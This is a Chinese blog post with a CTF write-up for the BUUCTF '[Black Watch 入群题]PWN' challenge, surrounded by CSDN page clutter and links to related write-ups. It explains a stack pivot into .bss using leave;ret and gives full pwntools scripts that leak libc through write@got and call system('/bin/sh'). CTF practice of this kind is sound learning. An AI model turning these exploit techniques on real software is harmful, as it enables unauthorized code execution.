[Black Watch 入群题]PWN-栈迁移

最新推荐文章于 2024-03-13 21:28:03 发布
最新推荐文章于 2024-03-13 21:28:03 发布
阅读量397 收藏 1
点赞数
分类专栏: PWN 文章标签: linux
cctrl
本文链接:https://blog.csdn.net/weixin_44309300/article/details/130276286
版权

1,三连
在这里插入图片描述2,ida分析
在这里插入图片描述
思路:ret2shellcode

3,payload

from pwn import *

context(arch='x86', os='linux', log_level='debug')

p=process('./spwn')

shellcode = asm(shellcraft.sh())

p.recvuntil("What is your name?")
p.send(shellcode)

#gdb.attach(p)
payload=b'a'*0x1C+p32(0x0804A300)

p.recvuntil("say?")
p.send(payload)
#pause()

p.interactive

失败,bss段没有可执行权限,只有读写权限:
在这里插入图片描述改变思路:由于此程序没有可直接ret利用的函数同时溢出空间很小,所以需要栈迁移 + ret2libc
重点: buf溢出栈空间只有0x20-0x18=8字节无法构造rop,所以需要利用栈迁移技术,迁移到bss上构造rop。

栈迁移关键指令:leave

leave 等价
	mov rsp, rbp	//rsp = rbp,改变栈顶(恢复rsp,去靠近rbp)
	pop rbp		//改变栈底(还原ebp)

栈迁移操作:构造好栈中ebp新位置。

4,栈布局
buf栈布局

低地址
---------
a*18
--------
&s - 4		//-4是因为leave = 》 后有个pop rbp导致rsp+4,此时新栈顶esp才会正好指向&s
--------
leave_ret	- ret
------
高地址

查找leave_ret地址(也可用ROPgadget查找):
在这里插入图片描述bss栈布局:(左边是第一泄露Libc构造栈帧,右边是第二次重写获取shell的栈帧)

&s - 4 
----------------&s的位置
write_plt		|	system
---------------
main			|	deadbeef
----------------
1				|	sh
-----------------
write_got
-----------------
4

5,payload

from pwn import *
from LibcSearcher import *

context(arch='x86', os='linux', log_level='debug')

p=process('./spwn')
#p=remote('node4.buuoj.cn',25623)
elf=ELF('./spwn')

write_plt=elf.plt['write']
write_got=elf.got['write']
main=0x8048513
s=0x0804A300
leave_ret=0x08048408

payload=p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
p.recvuntil("What is your name?")
p.send(payload)

payload1=b'a'*0x18+p32(s-4)+p32(leave_ret)
p.recvuntil("What do you want to say?")
p.send(payload1)

write_addr=u32(p.recv(4))

libc=LibcSearcher('write',write_addr)
libc_base=write_addr-libc.dump('write')
system=libc_base+libc.dump('system')
sh=libc_base+libc.dump('str_bin_sh')

p.recvuntil("name?")
payload=p32(system)+p32(0)+p32(sh)
p.sendline(payload)

p.recvuntil("say?")
p.sendline(payload1)

p.interactive()

在这里插入图片描述
细节详情参考:https://blog.csdn.net/mcmuyanga/article/details/109260008

hercu1iz
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN 迁移门解说 [Black Watch 群题]PWN
weixin_45441024的博客
11-30 668
PWN迁移解说 适用情况: 1.溢出的长度不足以让我们把ROP写进去 2.程序开启了的不可执行保护 基础知识: 我们迁移的目的就是将我们在上不可执行的链子转移到data段或者bss段上面 ,这里就需要用到leave;ret了,在这一类的题型中我们是构造并使用两次leave,来将ebp转移到我们构造的后门的起始位置。 寻找leave;ret需要用到ROPgadget这个工具 $ ROPgadget --binary '/home/pwn/Desktop/bbys_tu_2016' --only
BUUCTF:[Black Watch 群题]PWN(write up)
qq_44768749的博客
08-23 928
BUUCTF:[Black Watch 群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 迁移补充32位程序 0x01 文件分析 开启了不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是溢出 0x03 IDA 虽然buf在上但输的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输的长度也够长,因此想到了迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
[Black Watch 群题]PWN
m0sway的博客
11-24 1383
[Black Watch 群题]PWN 使用checksec查看: 只开启了不可执行,拉进IDA中查看: 直接给了漏洞函数,跟进看: 变量s里面可写0x200个字符,放在bss段中。变量buf里面可写0x20个字符,但是并不能溢出。 可以联想到迁移的方法,将迁移到变量s所在的bss段中,s里面放上payload 这题没有system和/bin/sh,需要先进行libc泄露再getshell exp: from pwn import * #start r = remote("node4.b
[BUUCTF]PWN——[Black Watch 群题]PWN
mcmuyanga的博客
10-26 2504
[Black Watch 群题]PWN——劫持 群题密码在 /password.txt Ubuntu 16 2020年02月27日:此群题已作废,请看新版群题。 附件 解题步骤: 例行检查,32位程序,开启了nx保护 运行一下程序,两次输,测试时发现输长度过长,会报错 32位ida载,首先shift+f12查看一下程序里的字符串,没有system函数和‘/bin/sh’的字符串,这边需要我们自己去想办法构造system(‘/bin/sh’) 从main函数开始看程序
【BUUCTF】[Black Watch 群题]PWN
m0_51251108的博客
12-27 402
【BUUCTF】[Black Watch 群题]PWN 记录下刷题,方便自己以后回顾,写的很烂,还请见谅 本题要用迁移 先checksec,file和nc看下程序 32位,动态链接,无canary和pie 思路:vul_function()里最后的read能溢出,但位置太短,不够写rop,运用迁移跳转至跳转至上一个read,写rop链,ret2libc后就能拿到shell了 主要是如何迁移: leave ret相当于: leave => mov esp, ebp; pop ebp
pwn--迁移
weixin_44642009的博客
04-17 990
迁移–ROP 本次实验我们使用lab4的可执行文件。 在开始之前我们需要明确一些问题以及需要注意的地方,以下我会讲到,这也是在实验过程中我碰到的一些情况和解题关键: 为什么使用迁移? 由上图可知,程序开辟的堆大小是0x50字节,而read函数输可以输0x60字节,明显存在溢出的可能,不过可输的字节数不是足够多,空间较小,不足以使我们填足够的ROP链,所以我们需要迁移。 ...
pwn --迁移
zszcr的博客
04-07 7033
迁移主要是为了解决溢出可以溢出空间大小不足的问题迁移的实现:通过将ebp覆盖成我们构造的fake_ebp ,然后利用leave_ret这个gadget将esp劫持到fake_ebp的地址上leave_ret相当于:mov %ebp,%esp pop %ebp pop %eip接下来拿HITCON-Training-master 的 lab6做例子题目链接:https://github.com...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
BUUCTF-[Black Watch 群题]PWN
Fzuim的博客
04-14 386
常规检查下来,发现可以进行溢出,但是允许操作的空间只有8个字节… 看下ida伪代码 可操作空间很小,只能覆盖到eip,正常思路是:泄露write的got表地址,然后通过libcsearch找出system和bin/sh的地址,再次构造溢出攻击。此题目溢出只能操作8字节,一般思路行不通。此时就用到另一个概念:迁移!!! 迁移的关键点在于esp,能把esp重新指向另外一块内存空间,即可成功。这题的另一块内存空间就是bss段。 利用到迁移,我们需要在原本的eip位置覆盖成 leave;r.
ctf pwn 题目
m0_64195960的博客
04-11 1399
2022年3月21迁移 这道题是迁移 1)先checksec一下 嗯哼哼,貌似影响不大 2)丢在ida里瞅 1、main() 没啥用再看看其它的 2、vul() 第一个read读进去的东西,可以被printf呸!吐出来! 芜湖!看到了第二个read可以溢出,但是可以溢出的空间太少! ————————那么就要来到了,刚学习的迁移—————————— 3、hack() 芜湖看到system函数了,那我们就可以获得system的返回地址从而调用.
Black_Watch_群题_PWN
z1r0的博客
12-09 1244
Black_Watch_群题_PWN 查看保护 有溢出,长度不够,又有s可以存放payload。所以迁移 用ebp和esp这两个跳板,控制eip顺利执行需要的payload。 leave_ret(mov esp, ebp; pop ebp;)用这个gadgets。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug:
[Black Watch 群题]PWN迁移
qq_39869547的博客
02-06 993
迁移主要解决溢出空间不足的问题, 前提条件知道欲迁移位置的地址。 from LibcSearcher import * from PwnContext.core import * binary = './spwn' debug_libc = './libc-2.23.so' elf = ELF(binary) libc = ELF(debug_libc) local = 1 if local ...
(BUUCTF)Black_Watch_群题_PWN2 (tcache stash unlink attack原理和例题)
xy1458214551的博客
12-25 909
BUUCTF的BlackWatch群题PWN2的题解,作为经典的tcache stash unlink利用
[BUUCTF-pwn]——[Black Watch 群题]PWN
Y_peak的博客
02-21 247
[BUUCTF-pwn]——[Black Watch 群题]PWN 题目地址: https://buuoj.cn/challenges#[Black Watch 群题]PWN 思路 由于可以利用的溢出空间不够, 利用给定的bss段, 利用劫持到bss段。进行操作。 下面的 -4操作是因为会有一个pop ebp的指令执行, 执行过后。会 +4 exploit from pwn import * from LibcSearcher import * elf = ELF("./spwn") p =
PWN · 迁移】[BUUCTF][Black Watch 群题]PWN
Mr_Fmnwon的博客
08-01 411
进能够覆盖ebp和ret,很难不往迁移上想。 修改ebp和ret后我们可以将指针指向另一处地址addr,需要ebp修改为ebp-4和ret修改为leave;ret地址。这是触发迁移的基本过程。 查看整个代码发现没有后门函数。 2.泄露libc 没有system函数的使用,但是有write函数。我们可以通过write泄露write的真实地址,从而泄露libc的地址。进一步可以拿到system和str_bin_sh的地址。 3.组合流程① read大量数据,可以是 aaaa + write.pl
buu [Black Watch 群题]PWN 1
最新发布
weixin_74861133的博客
03-13 795
程序的逻辑是先输出一段话m1:Hello good Ctfer!再向s中输0x200的数据,再输出一段话m2:What do you want to say?然后再向buf中读0x20的数据。
[Black Watch 群题]PWN 劫持的利用
半岛铁盒的博客
08-17 367
32位程序,开启了nx保护 没有system函数和‘/bin/sh’的字符串,这边需要我们自己去想办法构造system(‘/bin/sh’) 思路 第一次输的参数s,那边我们可以写很长的数据,我们可以将我们的rop链布置在那里, 接着执行第二次输,利用站劫持,把程序的执行流程劫持到第一次输的位置就可以了 站劫持利用 做劫持主要用到的是一个leave;ret指令,一般程序执行完成后都会调用leave;ret来还原现场 payload1=‘a’*0x18+p32(s-4)+p32(leave_r
[Black Watch 群题]PWN迁移
wuyvle的博客
02-22 212
进去康康函数结构 第二个read函数可以溢出但是可以构造的rop链很短 0x20-0x18 不过可以用第一个read构造ROP链,且刚好在bss段中,之后迁移到该地址执行,后面就是常规的泄露libc来getshell 迁移 首先来介绍一下迁移是什么? 以32位程序举例,在使用call这个命令,进一个函数的时候,程序会进行一系列操作: push eip+4; push ebp; mov ebp,esp; 这些操作是用来保护现场,避免执行完函数后堆不平衡以及找不到之前的口地址。 执行完函数后.
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值